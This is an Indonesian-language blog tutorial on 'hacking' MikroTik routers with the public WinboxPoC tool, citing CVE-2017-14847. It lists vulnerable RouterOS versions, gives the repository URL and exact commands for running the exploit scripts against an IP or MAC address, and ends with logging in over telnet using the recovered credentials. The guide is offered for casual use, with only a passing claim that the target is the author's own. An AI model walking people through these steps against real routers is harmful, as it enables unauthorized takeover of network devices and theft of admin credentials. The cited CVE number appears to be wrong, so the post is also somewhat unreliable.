Pada kesempatan kali ini admin akan memberikan tutorial cara menggunakan WinboxPoC untuk hack mikrotik.
Jadi kerentanan yang ada disini dengan memanfaatkan bug (CVE-2017-14847) yang nantinya tools akan berkerja untuk membypass proses otentuikasi dan membaca file dengan cara memodifikasi permintaan untuk mengubah 1 byte yang terkait dengan session ID.
Pengertian Mikrotik
Kerentanan untuk versi Mikrotik RouterOs
• Stabil: 6,29 – 6,42
• Jangka Panjang: 6.30.1 – 6.40.7
• Beta: 6.29rc1 – 6.43rc3
Syarat
Mengunakan Python 3+
Tutorial
1. Klon Winbox
Nah pertama kali yang harus kalian lakukan adalah mengklon WinBoxnya. Berikut toolsnya
https://github.com/BasuCert/WinboxPoC.git2. Lock Target
Disini admin menggunakan target milik sendiri. Menggunakan alamat IP.
3. Execute
• Jika targetnya menggunakan alamat IP maka gunakan perintah:
$python3 WinboxExploit.py <IP–TARGET> [PORT]
*Untuk ip address wajib diisi dan untuk port bisa diisi oposional.
Misal:
$python3 WinboxExploit.py 192.168.1.1 8000
• Jika targetnya menggunakan MacAddress, maka gunakan perintah
$python3 MACServerExploit.py <MAC-ADDRESS>
Misal:
$python3 MACServerExploit.py wk:wk:wk:wk:wk:wk (contoh wkwk)
Nah, Ini hasilnya...
Jika sudah mendapatkan akses login, Langsung saja kita masuk menggunakan Telnet.
Caranya:
$telnet <IP/MAC-ADDRESS>
Dan hasilnya…
Share & save jika bermanfaat hihihi